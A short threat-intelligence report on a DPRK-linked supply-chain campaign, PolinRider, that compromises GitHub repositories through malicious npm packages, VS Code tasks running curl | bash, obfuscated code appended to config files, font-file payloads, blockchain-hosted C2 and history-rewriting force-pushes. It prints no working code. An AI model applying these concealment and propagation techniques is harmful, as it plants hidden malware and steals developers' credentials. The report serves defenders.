A supply chain campaign attributed to a DPRK-linked threat actor, PolinRider, has resulted in the compromise of over 1,900 GitHub repositories through malicious npm packages, VS Code artifacts, and injected JavaScript payloads. The campaign leverages stealthy code injection and blockchain-based command-and-control (C2) infrastructure to achieve persistent access, remote code execution, and credential theft across developer environments and downstream projects.
The infection primarily originates from malicious npm packages and potentially compromised developer tooling, which execute during install or build phases. These packages inject heavily obfuscated JavaScript payloads into legitimate project configuration files (e.g., postcss.config.mjs, tailwind.config.js) by appending malicious code after valid content, making detection difficult. Additional infection vectors include malicious .vscode/tasks.json files executing curl | bash, weaponized take-home coding templates, and even payloads hidden within .woff2 font files.
Once executed, the malware deploys a multi-stage payload that includes a backdoor and infostealer, culminating in the delivery of a Beavertail variant. The payload retrieves encrypted second-stage code from blockchain networks (TRON, Aptos, BSC), decrypts it using XOR keys, and executes it via eval(), enabling remote code execution and persistence through detached processes. The campaign also includes a propagation mechanism (temp_auto_push.bat) that rewrites Git commit history to hide malicious changes and force-push them to remote repositories, facilitating further spread.